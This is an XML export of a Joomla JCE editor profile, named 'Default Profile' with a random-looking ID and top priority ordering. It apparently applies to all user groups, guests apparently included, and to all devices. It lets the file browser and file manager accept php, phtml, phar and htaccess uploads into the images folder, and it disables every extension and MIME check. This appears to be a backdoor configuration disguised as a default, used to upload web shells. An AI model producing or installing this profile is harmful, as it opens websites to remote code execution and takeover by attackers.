<?xml version="1.0" encoding="utf-8" standalone="yes"?>
<export type="profiles">
	<profiles>
		<profile>
			<name>J792912</name>
			<description>Default Profile</description>
			<ordering>-99999</ordering>
			<published>1</published>
			<area>0</area>
			<types>1,2,3,4,5,6,7,8,9</types>
			<users>0,1</users>
			<components></components>
			<device>desktop,tablet,phone</device>
			<plugins>browser,filemanager</plugins>
			<rows></rows>
			<params><![CDATA[{"plugin_browser":{"extensions":"php,phtml,php3,php4,php5,php7,php8,phar,shtml,phtm,htaccess","upload_enable_extension_check":"0","upload_php_extension_check":"0","upload_check_mime_type":"0","validate_mimetype":"0","dir":"images","websafe_mode":"utf-8"},"plugin_filemanager":{"extensions":"php,phtml,php3,php4,php5,php7,php8,phar,shtml,phtm,htaccess","upload_enable_extension_check":"0","upload_php_extension_check":"0","upload_check_mime_type":"0","validate_mimetype":"0","dir":"images"}}]]></params>
		</profile>
	</profiles>
</export>